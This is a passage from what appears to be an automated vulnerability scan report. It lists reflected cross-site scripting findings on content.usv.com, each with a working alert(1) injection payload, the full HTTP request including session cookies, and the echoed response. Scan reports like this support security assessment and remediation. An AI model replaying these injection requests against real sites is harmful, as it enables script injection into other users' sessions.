Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31733
Date: Wed, 05 Oct 2011 21:04:16 GMT
X-Varnish: 650529180
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages1265d";alert(1)//705653a3bf2/covestor";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loca
...[SNIP]...

3.150. http://content.usv.com/pages/covestor [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/covestor

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a68"><script>alert(1)</script>a29211bf554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesc4a68"><script>alert(1)</script>a29211bf554/covestor HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.6.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31838
Date: Wed, 05 Oct 2011 21:04:15 GMT
X-Varnish: 650529093
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc4a68"><script>alert(1)</script>a29211bf554/covestor%0AServer: content.usv.com%0APath: /pagesc4a68">
...[SNIP]...

3.151. http://content.usv.com/pages/gary-chou [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/gary-chou

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c83f9"%3balert(1)//97441585075 was submitted in the REST URL parameter 1. This input was echoed as c83f9";alert(1)//97441585075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesc83f9"%3balert(1)//97441585075/gary-chou HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=af1fbe8bce28ace8e37c4e3b99d9c1c5; path=/; expires=Thu, 06-Oct-2011 21:19:49 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31724
Date: Wed, 05 Oct 2011 21:19:49 GMT
X-Varnish: 650612289
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesc83f9";alert(1)//97441585075/gary-chou";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loc
...[SNIP]...

3.152. http://content.usv.com/pages/gary-chou [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/gary-chou

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f01f6"><script>alert(1)</script>63c7deabc70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesf01f6"><script>alert(1)</script>63c7deabc70/gary-chou HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=af1fbe8bce28ace8e37c4e3b99d9c1c5; path=/; expires=Thu, 06-Oct-2011 21:19:48 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31829
Date: Wed, 05 Oct 2011 21:19:48 GMT
X-Varnish: 650612225
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesf01f6"><script>alert(1)</script>63c7deabc70/gary-chou%0AServer: content.usv.com%0APath: /pagesf01f6">
...[SNIP]...

3.153. http://content.usv.com/pages/hashable [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/hashable

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caad"><script>alert(1)</script>827854c5c88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages6caad"><script>alert(1)</script>827854c5c88/hashable HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.7.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:18 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31838
Date: Wed, 05 Oct 2011 21:04:18 GMT
X-Varnish: 650529312
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages6caad"><script>alert(1)</script>827854c5c88/hashable%0AServer: content.usv.com%0APath: /pages6caad">
...[SNIP]...

3.154. http://content.usv.com/pages/hashable [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/hashable

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f646"%3balert(1)//0778822b38e was submitted in the REST URL parameter 1. This input was echoed as 7f646";alert(1)//0778822b38e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages7f646"%3balert(1)//0778822b38e/hashable HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.7.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:19 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31733
Date: Wed, 05 Oct 2011 21:04:19 GMT
X-Varnish: 650529418
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages7f646";alert(1)//0778822b38e/hashable";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loca
...[SNIP]...

3.155. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/john-buttrick

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dba"><script>alert(1)</script>1b2d7d1fc8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages34dba"><script>alert(1)</script>1b2d7d1fc8d/john-buttrick HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 20:43:28 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31849
Date: Wed, 05 Oct 2011 20:43:29 GMT
X-Varnish: 1169892431
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages34dba"><script>alert(1)</script>1b2d7d1fc8d/john-buttrick%0AServer: content.usv.com%0APath: /pages34dba">
...[SNIP]...

3.156. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/john-buttrick

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82c12"%3balert(1)//83ae392392d was submitted in the REST URL parameter 1. This input was echoed as 82c12";alert(1)//83ae392392d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages82c12"%3balert(1)//83ae392392d/john-buttrick HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 20:43:29 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31744
Date: Wed, 05 Oct 2011 20:43:30 GMT
X-Varnish: 1169892519
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages82c12";alert(1)//83ae392392d/john-buttrick";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document
...[SNIP]...

3.157. http://content.usv.com/pages/skillshare [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/skillshare

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd56"%3balert(1)//e892091a97f was submitted in the REST URL parameter 1. This input was echoed as abd56";alert(1)//e892091a97f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesabd56"%3balert(1)//e892091a97f/skillshare HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.4.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.8.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:28 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31743
Date: Wed, 05 Oct 2011 20:45:28 GMT
X-Varnish: 1169905068
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesabd56";alert(1)//e892091a97f/skillshare";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.lo
...[SNIP]...

3.158. http://content.usv.com/pages/skillshare [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/skillshare

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34eb"><script>alert(1)</script>1f51c521a96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesc34eb"><script>alert(1)</script>1f51c521a96/skillshare HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.4.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.8.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:27 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31848
Date: Wed, 05 Oct 2011 20:45:27 GMT
X-Varnish: 1169904973
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc34eb"><script>alert(1)</script>1f51c521a96/skillshare%0AServer: content.usv.com%0APath: /pagesc34eb">
...[SNIP]...

3.159. http://content.usv.com/pages/soundcloud [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/soundcloud

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb488"%3balert(1)//acae32804fb was submitted in the REST URL parameter 1. This input was echoed as bb488";alert(1)//acae32804fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesbb488"%3balert(1)//acae32804fb/soundcloud HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.5.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.9.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:43 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31743
Date: Wed, 05 Oct 2011 20:45:43 GMT
X-Varnish: 1169906638
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesbb488";alert(1)//acae32804fb/soundcloud";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.lo
...[SNIP]...

3.160. http://content.usv.com/pages/soundcloud [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/soundcloud

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd4d"><script>alert(1)</script>62f7eabc170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesebd4d"><script>alert(1)</script>62f7eabc170/soundcloud HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.5.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.9.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:43 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31848
Date: Wed, 05 Oct 2011 20:45:43 GMT
X-Varnish: 1169906556
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
